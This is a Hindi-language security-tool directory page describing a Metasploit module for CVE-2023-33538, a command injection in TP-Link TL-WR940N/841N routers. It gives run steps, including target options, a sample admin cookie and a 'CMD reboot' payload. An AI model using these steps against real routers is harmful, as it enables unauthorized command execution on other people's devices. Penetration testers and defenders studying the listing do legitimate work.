Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mrowkoob/cve-2023-33538-msf
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHubmrowkoob/cve-2023-33538-msf

CVE-2023-33538-msf

CVE-2023-33538 - TP-Link कमांड इंजेक्शन Ruby मॉड्यूल Metasploit Framework के लिए

रिपॉजिटरी देखें
1141 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-33538 – TP-Link TL-WR940N/841N Command Injection (Metasploit मॉड्यूल)

यह Metasploit सहायक मॉड्यूल TP-Link TL-WR940N V2/V4 और TL-WR841N V8/V10 राउटर्स में एक प्रमाणित कमांड इंजेक्शन भेद्यता को लक्षित करता है।
समस्या WlanNetworkRpm.htm में उपयोग किए जाने वाले कमजोर ssid1 पैरामीटर में है, जो मनमाने शेल कमांड्स के इंजेक्शन की अनुमति देता है।

सफल होने पर, यह हमलावर को डिवाइस पर मनमाने कमांड निष्पादित करने की अनुमति देता है।

CVE के बारे में अधिक जानकारी:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538


इस मॉड्यूल को कैसे चलाएं?

  1. .rb फ़ाइल को अपने Metasploit मॉड्यूल फ़ोल्डर में कॉपी करें, उदाहरण के लिए:
root@kitploit:~
cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
  1. Metasploit कंसोल शुरू करें:
root@kitploit:~
msfconsole
  1. मॉड्यूल खोजें और उपयोग करें:
root@kitploit:~
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
  1. आवश्यक विकल्प सेट करें:
root@kitploit:~
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run

यह मॉड्यूल प्रमाणीकरण नहीं करता है। आपको राउटर के वेब इंटरफ़ेस में सफल लॉगिन से Authorization कुकी और सत्र उपसर्ग मैन्युअल रूप से निकालना होगा।


संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2023-33538
  • https://web.archive.org/web/20230609111043/https://github.com/a101e-IoTvul/iotvul/blob/main/tp-link/3/TL-WR940N_TL-WR841N_userRpm_WlanNetworkRpm_Command_Injection.md

अस्वीकरण

यह मॉड्यूल केवल शैक्षिक उद्देश्यों के लिए है।
इस कोड का उपयोग उन उपकरणों या बुनियादी ढांचे के खिलाफ न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।


समस्याएं

यदि आपको बग मिलते हैं, या सुधार के विचार हैं – तो बेझिझक एक issue खोलें या टिप्पणी छोड़ें।

टूल डाउनलोड करें